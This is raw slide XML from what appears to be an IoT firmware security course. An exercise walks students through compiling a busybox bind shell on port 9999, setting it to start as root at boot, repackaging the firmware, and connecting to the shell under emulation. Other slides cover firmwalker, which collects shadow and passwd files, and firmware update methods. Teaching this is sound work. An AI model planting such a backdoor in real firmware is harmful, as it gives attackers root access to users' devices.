            <a:ext cx="11582400" cy="3920837"/>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next slide contains a program that opens up port 9999 with a shell and listens for connections.  As an exercise, compile it for the target device, put it in the extracted file system and modify the configuration information so the program is started (as root) on startup.</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Now repackage the firmware with the firmware mod kit (FMK)</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Go to the parent directory of the FMK where we put the file system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Run: ./build-firmware.sh Firmware-directory –nopad –min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There will be a new firmware package in new-firmware.bin</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Load the IoT device with the new firmware.</a:t>
            </a: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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="433851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60975"/>
            <a:ext cx="11431451" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Backdoor code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208392" y="1718216"/>
            <a:ext cx="5819876" cy="4689771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define SERVER_PORT 9999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> //CC-BY: Osanda Malith Jayathissa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> // Bind Shell running busybox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int serverfd, clientfd, server_pid;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int i = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char *banner = Shell\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char *args[] = {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    "/bin/busybox", "sh", (char *) 0 };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  struct sockaddr_in server, client;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  socklen_t len;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  server.sin_family = AF_INET;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  server.sin_port = htons(SERVER_PORT);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  server.sin_addr.s_addr = INADDR_ANY; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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62916B25-5666-FD41-927D-F3935D9AFE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{857C5398-95C8-A342-BA9D-6EE38280CDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5668310" y="1271913"/>
            <a:ext cx="6315298" cy="526699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600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  serverfd = socket(AF_INET, SOCK_STREAM, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  bind(serverfd, (struct sockaddr *)&amp;server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       sizeof(server));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  listen(serverfd, 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  while (1) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    len = sizeof(struct sockaddr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    clientfd = accept(serverfd,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      (struct sockaddr *)&amp;client, &amp;len);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    server_pid = fork(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if (server_pid) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      write(clientfd, banner,  strlen(banner));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      for(; i &lt; 3 /*u*/; i++) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        dup2(clientfd, i);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      execve("/bin/busybox", args, (char *) 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      close(clientfd); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  close(clientfd);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4211546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4772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Emulate entire firmware package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="1620982"/>
            <a:ext cx="11582400" cy="4613565"/>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Now we can use qemu to emulate the firmware</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chroot fw_filesystem qemu-arm-static ./bin/busybox</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To emulate entire image we need to run it under qemu on the right architecture and intercept calls to custom hardware and return appropriate values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To figure out hardware dependence download the “firmware-analysis-toolkit” which is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run:</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sudo ./setup.sh</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The toolkit uses binwalk so you need to modify the FIRMWARE_DIR variable to point to the directory of the firmware-analysis-toolkit</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To run it, sudo ./fat.py</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It will tell you the address assigned to the device</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If you run it on the modified image, you should be able to connect to the port 9999 and connect to the shell we installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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lgn="l"/>
            <a:endParaRPr lang="en-US"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558BF449-89A2-6E40-AE34-D8D2483C6BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2334948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17" y="50068"/>
            <a:ext cx="12085983" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scan firmware for vulnerabilities with firmwalker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1596044"/>
            <a:ext cx="11582400" cy="490708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Firmwalker is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Firmwalker can do the following:</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Collect /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/shadow and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/passwd</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Retrieve the etc/ssl directory</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Find configuration and SSL related files</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Find script files and binaries</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Identify web servers used on IoT devices</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Identify binaries such as ssh, tftp, dropbear, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">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Locate URLs, email addresses, and IP addresses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After extracting the firmware with binwalk into target_bin.extracted, run</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./firmwalker.sh target_bin.extracted</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It dumps analysis in “firmwalker.txt.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="base">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You can get sample firmware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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F779C9C5-602C-7D4B-96BF-F4A9EF98F293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004773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426720" y="1480463"/>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Firmware updates are vary between different vendors and different devices</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General methods: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User installs Firmware update manually (e.g. the update is available on the vendor’s website)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Requires some form of user interface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Common for: Routers, IP cameras, NAS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Device installs Firmware update itself (e.g. downloads it from the internet)</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Triggered by an app or automatically by the device itself</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Common for: Home appliances, Lightbulbs, Sensors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Problem: We need to get the firmware updates files somehow, like intercepting HTTP</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Advantage: Firmware most often less protected (e.g. not encrypted or signed)</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Multiple strategies for firmware installation:</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Active and passive copy of the OS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Fixed OS, updated application firmware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Differential changes to one copy of the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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68</a:t>
            </a:fld>
